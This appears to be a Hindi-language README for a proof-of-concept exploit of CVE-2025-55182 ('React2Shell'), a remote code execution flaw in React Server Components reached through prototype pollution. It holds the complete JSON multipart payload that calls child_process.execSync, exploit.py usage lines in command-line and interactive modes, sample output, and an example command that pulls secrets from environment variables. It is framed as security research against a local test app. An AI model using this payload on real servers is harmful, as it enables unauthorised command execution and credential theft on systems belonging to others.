
CVE-2025-55182 (React2Shell) के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, जो React Server Components में प्रोटोटाइप प्रदूषण के माध्यम से एक गंभीर RCE भेद्यता है। इसमें इंटरैक्टिव और कमांड-लाइन शोषण मोड शामिल हैं।
React सर्वर घटक FormData को असुरक्षित रूप से डिसीरियलाइज़ करते हैं। विशेष रूप से तैयार किए गए मल्टीपार्ट फ़ील्ड प्रोटोटाइप प्रदूषण को ट्रिगर करते हैं और child_process.execSync के माध्यम से मनमाना कोड निष्पादित करते हैं।
npm install
pip3 install requests
npm run dev
एप्लिकेशन इस पते पर चलता है: http://localhost:3000
python3 exploit.py -c "whoami"
python3 exploit.py -c "whoami"
python3 exploit.py -c "pwd"
python3 exploit.py -c "ls -la"
python3 exploit.py -c "cat package.json"
python3 exploit.py -c "env | grep SECRET"
python3 exploit.py -i
> whoami
COMMAND RESULT:
your-username
============================================================
> pwd
COMMAND RESULT:
/path/to/project
============================================================
> exit
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('CMD',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {"get": "$1:constructor:constructor"}
}
}
npm run dev
python3 exploit.py -c "whoami"
python3 exploit.py -c "whoami" -v
पूर्ण पेलोड संरचना और सर्वर प्रतिक्रिया दिखाता है
द्वारा: Guaxinim | साइबर सुरक्षा अनुसंधान